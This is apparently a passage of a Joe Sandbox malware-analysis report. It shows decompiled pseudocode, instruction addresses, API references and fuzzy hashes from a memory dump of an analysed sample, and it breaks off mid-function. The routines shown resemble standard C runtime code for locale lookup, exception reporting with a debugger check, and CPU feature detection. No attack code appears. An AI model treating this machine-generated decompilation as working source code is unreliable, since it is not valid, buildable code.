                                                                                      0x00413ebd
                                                                                      0x00413ec0
                                                                                      0x00413ec2
                                                                                      0x00413ecc
                                                                                      0x00413ed4
                                                                                      0x00413eda
                                                                                      0x00000000
                                                                                      0x00413ee1
                                                                                      0x00413ee4

                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413DD6
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00413EA2
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413EC2
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00413ECC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: e14b2efa5fe5e5553fbb2ee573e50a86ee26a3403d6dd35079497cbd310cf862
                                                                                      • Instruction ID: c12cfa2384cc08bf4641669c42ca0e7150b6ce3d5bd31e29dfbc754d7b5ffc75
                                                                                      • Opcode Fuzzy Hash: e14b2efa5fe5e5553fbb2ee573e50a86ee26a3403d6dd35079497cbd310cf862
                                                                                      • Instruction Fuzzy Hash: 13312775D41318EBDB21DFA1D9897CDBBB8AF08305F1041AAE40CAB250EB759B848F49
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0042B4FC(void* __ecx, signed char __edx, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				short _v248;
                                                                                      				signed int _v252;
                                                                                      				intOrPtr _v256;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t50;
                                                                                      				int _t56;
                                                                                      				signed int _t58;
                                                                                      				void* _t74;
                                                                                      				intOrPtr _t80;
                                                                                      				void* _t89;
                                                                                      				void* _t92;
                                                                                      				intOrPtr _t93;
                                                                                      				void* _t94;
                                                                                      				signed int _t111;
                                                                                      				signed int _t115;
                                                                                      				intOrPtr* _t117;
                                                                                      				intOrPtr* _t122;
                                                                                      				signed int* _t124;
                                                                                      				int _t126;
                                                                                      				signed int _t127;
                                                                                      				void* _t128;
                                                                                      				void* _t140;
                                                                                      
                                                                                      				_t121 = __edx;
                                                                                      				_t50 =  *0x443048; // 0x9900ec21
                                                                                      				_v8 = _t50 ^ _t127;
                                                                                      				_t125 = _a4;
                                                                                      				_t94 = E00420590(__ecx, __edx, _a4);
                                                                                      				_t124 =  *(E00420590(__ecx, __edx, _a4) + 0x34c);
                                                                                      				_t126 = E0042B824(_t125);
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
                                                                                      				_v252 = _v252 & 0x00000000;
                                                                                      				if(_t56 == 0) {
                                                                                      					L37:
                                                                                      					 *_t124 = 0;
                                                                                      					_t58 = 1;
                                                                                      					L38:
                                                                                      					return E0041361E(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
                                                                                      				}
                                                                                      				if(E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
                                                                                      					L16:
                                                                                      					if(( *_t124 & 0x00000300) == 0x300) {
                                                                                      						L36:
                                                                                      						_t58 =  !( *_t124 >> 2) & 0x00000001;
                                                                                      						goto L38;
                                                                                      					}
                                                                                      					asm("sbb eax, eax");
                                                                                      					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                                                      						goto L37;
                                                                                      					}
                                                                                      					_t74 = E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                                                      					if(_t74 != 0) {
                                                                                      						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
                                                                                      							_push(_t124);
                                                                                      							_t94 = 0;
                                                                                      							if(E0042B97E(_t126, 0) == 0) {
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							 *_t124 =  *_t124 | 0x00000100;
                                                                                      							L34:
                                                                                      							if(_t140 == 0) {
                                                                                      								_t124[1] = _t126;
                                                                                      							}
                                                                                      						}
                                                                                      						goto L36;
                                                                                      					}
                                                                                      					_t111 =  *_t124 | 0x00000200;
                                                                                      					 *_t124 = _t111;
                                                                                      					if( *(_t94 + 0x60) == _t74) {
                                                                                      						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_t122 =  *((intOrPtr*)(_t94 + 0x50));
                                                                                      						_v256 = _t122 + 2;
                                                                                      						do {
                                                                                      							_t80 =  *_t122;
                                                                                      							_t122 = _t122 + 2;
                                                                                      						} while (_t80 != _v252);
                                                                                      						_t121 = _t122 - _v256 >> 1;
                                                                                      						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
                                                                                      							_t74 = 0;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_push(_t124);
                                                                                      						if(E0042B97E(_t126, 1) == 0) {
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						 *_t124 =  *_t124 | 0x00000100;
                                                                                      						_t74 = 0;
                                                                                      						L21:
                                                                                      						_t140 = _t124[1] - _t74;
                                                                                      						goto L34;
                                                                                      					}
                                                                                      					L20:
                                                                                      					 *_t124 = _t111 | 0x00000100;
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				asm("sbb eax, eax");
                                                                                      				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                                                      					goto L37;
                                                                                      				}
                                                                                      				_t89 = E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                                                      				_t115 =  *_t124;
                                                                                      				if(_t89 != 0) {
                                                                                      					if((_t115 & 0x00000002) != 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
                                                                                      						L12:
                                                                                      						_t121 =  *_t124;
                                                                                      						if((_t121 & 0x00000001) != 0 || E0042B959(_t126) == 0) {
                                                                                      							goto L16;
                                                                                      						} else {
                                                                                      							 *_t124 = _t121;
                                                                                      							goto L15;
                                                                                      						}
                                                                                      					}
                                                                                      					_t92 = E0042DE7A(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
                                                                                      					_t128 = _t128 + 0xc;
                                                                                      					if(_t92 != 0) {
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					 *_t124 =  *_t124 | 0x00000002;
                                                                                      					_t124[2] = _t126;
                                                                                      					_t117 =  *((intOrPtr*)(_t94 + 0x50));
                                                                                      					_t121 = _t117 + 2;
                                                                                      					do {
                                                                                      						_t93 =  *_t117;
                                                                                      						_t117 = _t117 + 2;
                                                                                      					} while (_t93 != _v252);
                                                                                      					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
                                                                                      						_t124[1] = _t126;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t124[1] = _t126;
                                                                                      					 *_t124 = _t115 | 0x00000304;
                                                                                      					L15:
                                                                                      					_t124[2] = _t126;
                                                                                      				}
                                                                                      			}





























                                                                                      0x0042b4fc
                                                                                      0x0042b507
                                                                                      0x0042b50e
                                                                                      0x0042b513
                                                                                      0x0042b51c
                                                                                      0x0042b524
                                                                                      0x0042b533
                                                                                      0x0042b53f
                                                                                      0x0042b550
                                                                                      0x0042b556
                                                                                      0x0042b55f
                                                                                      0x0042b739
                                                                                      0x0042b73b
                                                                                      0x0042b73d
                                                                                      0x0042b73e
                                                                                      0x0042b74c
                                                                                      0x0042b74c
                                                                                      0x0042b578
                                                                                      0x0042b633
                                                                                      0x0042b63e
                                                                                      0x0042b72d
                                                                                      0x0042b734
                                                                                      0x00000000
                                                                                      0x0042b734
                                                                                      0x0042b652
                                                                                      0x0042b668
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b678
                                                                                      0x0042b681
                                                                                      0x0042b6f2
                                                                                      0x0042b70e
                                                                                      0x0042b70f
                                                                                      0x0042b71d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b71f
                                                                                      0x0042b728
                                                                                      0x0042b728
                                                                                      0x0042b72a
                                                                                      0x0042b72a
                                                                                      0x0042b728
                                                                                      0x00000000
                                                                                      0x0042b6f2
                                                                                      0x0042b685
                                                                                      0x0042b68b
                                                                                      0x0042b690
                                                                                      0x0042b6a5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b6a7
                                                                                      0x0042b6ad
                                                                                      0x0042b6b3
                                                                                      0x0042b6b3
                                                                                      0x0042b6b6
                                                                                      0x0042b6b9
                                                                                      0x0042b6c8
                                                                                      0x0042b6cd
                                                                                      0x0042b6e9
                                                                                      0x00000000
                                                                                      0x0042b6e9
                                                                                      0x0042b6cf
                                                                                      0x0042b6dd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b6df
                                                                                      0x0042b6e5
                                                                                      0x0042b69a
                                                                                      0x0042b69a
                                                                                      0x00000000
                                                                                      0x0042b69a
                                                                                      0x0042b692
                                                                                      0x0042b698
                                                                                      0x00000000
                                                                                      0x0042b698
                                                                                      0x0042b58c
                                                                                      0x0042b5a2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b5b2
                                                                                      0x0042b5b9
                                                                                      0x0042b5bd
                                                                                      0x0042b5cf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b5d5
                                                                                      0x0042b619
                                                                                      0x0042b619
                                                                                      0x0042b61e
                                                                                      0x00000000
                                                                                      0x0042b62b
                                                                                      0x0042b62e
                                                                                      0x00000000
                                                                                      0x0042b62e
                                                                                      0x0042b61e
                                                                                      0x0042b5e4
                                                                                      0x0042b5e9
                                                                                      0x0042b5ee
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b5f0
                                                                                      0x0042b5f3
                                                                                      0x0042b5f6
                                                                                      0x0042b5f9
                                                                                      0x0042b5fc
                                                                                      0x0042b5fc
                                                                                      0x0042b5ff
                                                                                      0x0042b602
                                                                                      0x0042b612
                                                                                      0x0042b614
                                                                                      0x0042b614
                                                                                      0x0042b5bf
                                                                                      0x0042b5c5
                                                                                      0x0042b5c8
                                                                                      0x0042b630
                                                                                      0x0042b630
                                                                                      0x0042b630

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B550
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B59A
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B660
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 661929714-0
                                                                                      • Opcode ID: 1fcac98c11902b44eaa6d513564f9c607318998a38525dea3ce738314f36f839
                                                                                      • Instruction ID: 2bd5c721c5fcb94935e4f6be14f52691898d4700b66d850c1932820e951b2741
                                                                                      • Opcode Fuzzy Hash: 1fcac98c11902b44eaa6d513564f9c607318998a38525dea3ce738314f36f839
                                                                                      • Instruction Fuzzy Hash: 1F6195716102279FDB289F25EC82BB7B3A8EF44704F5440BBE905C6285E738DD81CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00417E53(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				char _v0;
                                                                                      				signed int _v8;
                                                                                      				intOrPtr _v524;
                                                                                      				intOrPtr _v528;
                                                                                      				void* _v532;
                                                                                      				intOrPtr _v536;
                                                                                      				char _v540;
                                                                                      				intOrPtr _v544;
                                                                                      				intOrPtr _v548;
                                                                                      				intOrPtr _v552;
                                                                                      				intOrPtr _v556;
                                                                                      				intOrPtr _v560;
                                                                                      				intOrPtr _v564;
                                                                                      				intOrPtr _v568;
                                                                                      				intOrPtr _v572;
                                                                                      				intOrPtr _v576;
                                                                                      				intOrPtr _v580;
                                                                                      				intOrPtr _v584;
                                                                                      				char _v724;
                                                                                      				intOrPtr _v792;
                                                                                      				intOrPtr _v800;
                                                                                      				char _v804;
                                                                                      				struct _EXCEPTION_POINTERS _v812;
                                                                                      				void* __edi;
                                                                                      				signed int _t40;
                                                                                      				char* _t47;
                                                                                      				char* _t49;
                                                                                      				intOrPtr _t60;
                                                                                      				intOrPtr _t61;
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t66;
                                                                                      				int _t67;
                                                                                      				intOrPtr _t68;
                                                                                      				signed int _t69;
                                                                                      
                                                                                      				_t68 = __esi;
                                                                                      				_t65 = __edx;
                                                                                      				_t60 = __ebx;
                                                                                      				_t40 =  *0x443048; // 0x9900ec21
                                                                                      				_t41 = _t40 ^ _t69;
                                                                                      				_v8 = _t40 ^ _t69;
                                                                                      				if(_a4 != 0xffffffff) {
                                                                                      					_push(_a4);
                                                                                      					E00413F8E(_t41);
                                                                                      					_pop(_t61);
                                                                                      				}
                                                                                      				E00415180(_t66,  &_v804, 0, 0x50);
                                                                                      				E00415180(_t66,  &_v724, 0, 0x2cc);
                                                                                      				_v812.ExceptionRecord =  &_v804;
                                                                                      				_t47 =  &_v724;
                                                                                      				_v812.ContextRecord = _t47;
                                                                                      				_v548 = _t47;
                                                                                      				_v552 = _t61;
                                                                                      				_v556 = _t65;
                                                                                      				_v560 = _t60;
                                                                                      				_v564 = _t68;
                                                                                      				_v568 = _t66;
                                                                                      				_v524 = ss;
                                                                                      				_v536 = cs;
                                                                                      				_v572 = ds;
                                                                                      				_v576 = es;
                                                                                      				_v580 = fs;
                                                                                      				_v584 = gs;
                                                                                      				asm("pushfd");
                                                                                      				_pop( *_t22);
                                                                                      				_v540 = _v0;
                                                                                      				_t49 =  &_v0;
                                                                                      				_v528 = _t49;
                                                                                      				_v724 = 0x10001;
                                                                                      				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                      				_v804 = _a8;
                                                                                      				_v800 = _a12;
                                                                                      				_v792 = _v0;
                                                                                      				_t67 = IsDebuggerPresent();
                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                      				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                                      					_push(_a4);
                                                                                      					_t57 = E00413F8E(_t57);
                                                                                      				}
                                                                                      				return E0041361E(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                      			}





































                                                                                      0x00417e53
                                                                                      0x00417e53
                                                                                      0x00417e53
                                                                                      0x00417e5e
                                                                                      0x00417e63
                                                                                      0x00417e65
                                                                                      0x00417e6d
                                                                                      0x00417e6f
                                                                                      0x00417e72
                                                                                      0x00417e77
                                                                                      0x00417e77
                                                                                      0x00417e83
                                                                                      0x00417e96
                                                                                      0x00417ea4
                                                                                      0x00417eaa
                                                                                      0x00417eb0
                                                                                      0x00417eb6
                                                                                      0x00417ebc
                                                                                      0x00417ec2
                                                                                      0x00417ec8
                                                                                      0x00417ece
                                                                                      0x00417ed4
                                                                                      0x00417eda
                                                                                      0x00417ee1
                                                                                      0x00417ee8
                                                                                      0x00417eef
                                                                                      0x00417ef6
                                                                                      0x00417efd
                                                                                      0x00417f04
                                                                                      0x00417f05
                                                                                      0x00417f0e
                                                                                      0x00417f14
                                                                                      0x00417f17
                                                                                      0x00417f1d
                                                                                      0x00417f2a
                                                                                      0x00417f33
                                                                                      0x00417f3c
                                                                                      0x00417f45
                                                                                      0x00417f53
                                                                                      0x00417f55
                                                                                      0x00417f6a
                                                                                      0x00417f76
                                                                                      0x00417f79
                                                                                      0x00417f7e
                                                                                      0x00417f8b

                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00417F4B
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00417F55
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00417F62
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 8ec714e12ae7b128a46a4408e36659fd50e9308bbddc07f0adf5f3c5ff48a332
                                                                                      • Instruction ID: 0f1df055cd3c241758f2c3142034cd1ebe2107538da7602209f528a78068d6d9
                                                                                      • Opcode Fuzzy Hash: 8ec714e12ae7b128a46a4408e36659fd50e9308bbddc07f0adf5f3c5ff48a332
                                                                                      • Instruction Fuzzy Hash: A031B274941228ABCB21DF25D9897CDBBB8BF18311F5042EAE40CA7250EB749FC58F49
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041F752,?,20001004,00000000,00000002,?,?,0041ED54), ref: 00423465
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: 0'@
                                                                                      • API String ID: 2299586839-1999884151
                                                                                      • Opcode ID: c8229f7746bc158f5fbe8b296d7951ade04d501f6ec7cd96f2d52353943caad9
                                                                                      • Instruction ID: 26994373bb32126ae1ee7594069622b97e7e651582fef90fa22001185f41c7fd
                                                                                      • Opcode Fuzzy Hash: c8229f7746bc158f5fbe8b296d7951ade04d501f6ec7cd96f2d52353943caad9
                                                                                      • Instruction Fuzzy Hash: F9E04F31600528BBCF132F62EC05A9E7F36EF44B63F444426FD0566221CB7D8F21AA99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 88%
                                                                                      			E00413A75(signed int __edx) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				intOrPtr _t60;
                                                                                      				signed int _t61;
                                                                                      				signed int _t62;
                                                                                      				signed int _t63;
                                                                                      				signed int _t66;
                                                                                      				signed int _t67;
                                                                                      				signed int _t73;
                                                                                      				intOrPtr _t74;
                                                                                      				intOrPtr _t75;
                                                                                      				intOrPtr* _t77;
                                                                                      				signed int _t78;
                                                                                      				intOrPtr* _t82;
                                                                                      				signed int _t85;
                                                                                      				signed int _t90;
                                                                                      				intOrPtr* _t93;
                                                                                      				signed int _t96;
                                                                                      				signed int _t99;
                                                                                      				signed int _t104;
                                                                                      
                                                                                      				_t90 = __edx;
                                                                                      				 *0x444464 =  *0x444464 & 0x00000000;
                                                                                      				 *0x443050 =  *0x443050 | 0x00000001;
                                                                                      				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                      					L23:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                      				_push(_t74);
                                                                                      				_t93 =  &_v40;
                                                                                      				asm("cpuid");
                                                                                      				_t75 = _t74;
                                                                                      				 *_t93 = 0;
                                                                                      				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                                                      				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                                                      				 *(_t93 + 0xc) = _t90;
                                                                                      				_v16 = _v40;
                                                                                      				_v8 = _v28 ^ 0x49656e69;
                                                                                      				_v12 = _v32 ^ 0x6c65746e;
                                                                                      				_push(_t75);
                                                                                      				asm("cpuid");
                                                                                      				_t77 =  &_v40;
                                                                                      				 *_t77 = 1;
                                                                                      				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                                                      				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                                                      				 *(_t77 + 0xc) = _t90;
                                                                                      				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                                                                                      					L9:
                                                                                      					_t96 =  *0x444468; // 0x2
                                                                                      					L10:
                                                                                      					_t85 = _v32;
                                                                                      					_t60 = 7;
                                                                                      					_v8 = _t85;
                                                                                      					if(_v16 < _t60) {
                                                                                      						_t78 = _v20;
                                                                                      					} else {
                                                                                      						_push(_t77);
                                                                                      						asm("cpuid");
                                                                                      						_t82 =  &_v40;
                                                                                      						 *_t82 = _t60;
                                                                                      						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                                                      						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                                                      						_t85 = _v8;
                                                                                      						 *(_t82 + 0xc) = _t90;
                                                                                      						_t78 = _v36;
                                                                                      						if((_t78 & 0x00000200) != 0) {
                                                                                      							 *0x444468 = _t96 | 0x00000002;
                                                                                      						}
                                                                                      					}
                                                                                      					_t61 =  *0x443050; // 0x6f
                                                                                      					_t62 = _t61 | 0x00000002;
                                                                                      					 *0x444464 = 1;
                                                                                      					 *0x443050 = _t62;
                                                                                      					if((_t85 & 0x00100000) != 0) {
                                                                                      						_t63 = _t62 | 0x00000004;
                                                                                      						 *0x444464 = 2;
                                                                                      						 *0x443050 = _t63;
                                                                                      						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                                                      							asm("xgetbv");
                                                                                      							_v24 = _t63;
                                                                                      							_v20 = _t90;
                                                                                      							_t104 = 6;
                                                                                      							if((_v24 & _t104) == _t104) {
                                                                                      								_t66 =  *0x443050; // 0x6f
                                                                                      								_t67 = _t66 | 0x00000008;
                                                                                      								 *0x444464 = 3;
                                                                                      								 *0x443050 = _t67;
                                                                                      								if((_t78 & 0x00000020) != 0) {
                                                                                      									 *0x444464 = 5;
                                                                                      									 *0x443050 = _t67 | 0x00000020;
                                                                                      									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                                                      										 *0x443050 =  *0x443050 | 0x00000040;
                                                                                      										 *0x444464 = _t104;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					goto L23;
                                                                                      				}
                                                                                      				_t73 = _v40 & 0x0fff3ff0;
                                                                                      				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                                                      					_t99 =  *0x444468; // 0x2
                                                                                      					_t96 = _t99 | 0x00000001;
                                                                                      					 *0x444468 = _t96;
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      			}






























                                                                                      0x00413a75
                                                                                      0x00413a78
                                                                                      0x00413a82
                                                                                      0x00413a93
                                                                                      0x00413c45
                                                                                      0x00413c48
                                                                                      0x00413c48
                                                                                      0x00413a99
                                                                                      0x00413a9f
                                                                                      0x00413aa4
                                                                                      0x00413aa8
                                                                                      0x00413aac
                                                                                      0x00413aae
                                                                                      0x00413ab0
                                                                                      0x00413ab3
                                                                                      0x00413ab8
                                                                                      0x00413ac1
                                                                                      0x00413ad2
                                                                                      0x00413add
                                                                                      0x00413ae3
                                                                                      0x00413ae4
                                                                                      0x00413aea
                                                                                      0x00413aed
                                                                                      0x00413af7
                                                                                      0x00413afa
                                                                                      0x00413afd
                                                                                      0x00413b00
                                                                                      0x00413b45
                                                                                      0x00413b45
                                                                                      0x00413b4b
                                                                                      0x00413b4b
                                                                                      0x00413b50
                                                                                      0x00413b51
                                                                                      0x00413b57
                                                                                      0x00413b89
                                                                                      0x00413b59
                                                                                      0x00413b5b
                                                                                      0x00413b5c
                                                                                      0x00413b62
                                                                                      0x00413b65
                                                                                      0x00413b67
                                                                                      0x00413b6a
                                                                                      0x00413b6d
                                                                                      0x00413b70
                                                                                      0x00413b73
                                                                                      0x00413b7c
                                                                                      0x00413b81
                                                                                      0x00413b81
                                                                                      0x00413b7c
                                                                                      0x00413b8c
                                                                                      0x00413b91
                                                                                      0x00413b94
                                                                                      0x00413b9e
                                                                                      0x00413ba9
                                                                                      0x00413baf
                                                                                      0x00413bb2
                                                                                      0x00413bbc
                                                                                      0x00413bc7
                                                                                      0x00413bd3
                                                                                      0x00413bd6
                                                                                      0x00413bd9
                                                                                      0x00413be4
                                                                                      0x00413be9
                                                                                      0x00413beb
                                                                                      0x00413bf0
                                                                                      0x00413bf3
                                                                                      0x00413bfd
                                                                                      0x00413c05
                                                                                      0x00413c0a
                                                                                      0x00413c14
                                                                                      0x00413c22
                                                                                      0x00413c35
                                                                                      0x00413c3c
                                                                                      0x00413c3c
                                                                                      0x00413c22
                                                                                      0x00413c05
                                                                                      0x00413be9
                                                                                      0x00413bc7
                                                                                      0x00000000
                                                                                      0x00413c44
                                                                                      0x00413b05
                                                                                      0x00413b0f
                                                                                      0x00413b34
                                                                                      0x00413b3a
                                                                                      0x00413b3d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00413A8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: f12052dfdf4eec6d4ee5c056bec4c25f9eef27489052af0526b3fceb88185073
                                                                                      • Instruction ID: 672423d78a880ab3ac9c4519d5476871742042cf14ee69d1d4eb3a8e2a1c8a8d
                                                                                      • Opcode Fuzzy Hash: f12052dfdf4eec6d4ee5c056bec4c25f9eef27489052af0526b3fceb88185073
                                                                                      • Instruction Fuzzy Hash: 48519EB5901605CFEB18CF58D9827AEBBF4FB85711F14816AC405EB355E378AA80CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00428390(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				intOrPtr* _v28;
                                                                                      				intOrPtr* _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				signed int _v48;
                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                      				char _v605;
                                                                                      				void* _v612;
                                                                                      				signed int _v616;
                                                                                      				union _FINDEX_INFO_LEVELS _v620;
                                                                                      				union _FINDEX_INFO_LEVELS _v624;
                                                                                      				signed int _v628;
                                                                                      				union _FINDEX_INFO_LEVELS _v632;
                                                                                      				char _v636;
                                                                                      				signed int _v640;
                                                                                      				union _FINDEX_INFO_LEVELS _v644;
                                                                                      				union _FINDEX_INFO_LEVELS _v648;
                                                                                      				signed int _v652;
                                                                                      				union _FINDEX_INFO_LEVELS _v656;
                                                                                      				char _v660;
                                                                                      				signed int _v664;
                                                                                      				signed int _v668;
                                                                                      				signed int _v672;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t72;
                                                                                      				signed int _t77;
                                                                                      				signed int _t79;
                                                                                      				char _t81;
                                                                                      				signed char _t82;
                                                                                      				signed int _t88;
                                                                                      				signed int _t94;
                                                                                      				signed int _t100;
                                                                                      				signed int _t103;
                                                                                      				signed int _t104;
                                                                                      				signed int _t106;
                                                                                      				intOrPtr* _t112;
                                                                                      				signed int _t115;
                                                                                      				intOrPtr _t125;
                                                                                      				signed int _t127;
                                                                                      				signed int _t130;
                                                                                      				signed int _t132;
                                                                                      				void* _t135;
                                                                                      				void* _t137;
                                                                                      				intOrPtr _t139;
                                                                                      				intOrPtr* _t142;
                                                                                      				signed int _t144;
                                                                                      				void* _t146;
                                                                                      				intOrPtr* _t147;
                                                                                      				signed int _t156;
                                                                                      				void* _t164;
                                                                                      				signed int _t167;
                                                                                      				intOrPtr _t169;
                                                                                      				void* _t170;
                                                                                      				void* _t173;
                                                                                      				void* _t174;
                                                                                      				void* _t175;
                                                                                      				signed int _t176;
                                                                                      				signed int _t177;
                                                                                      				signed int _t180;
                                                                                      				void* _t181;
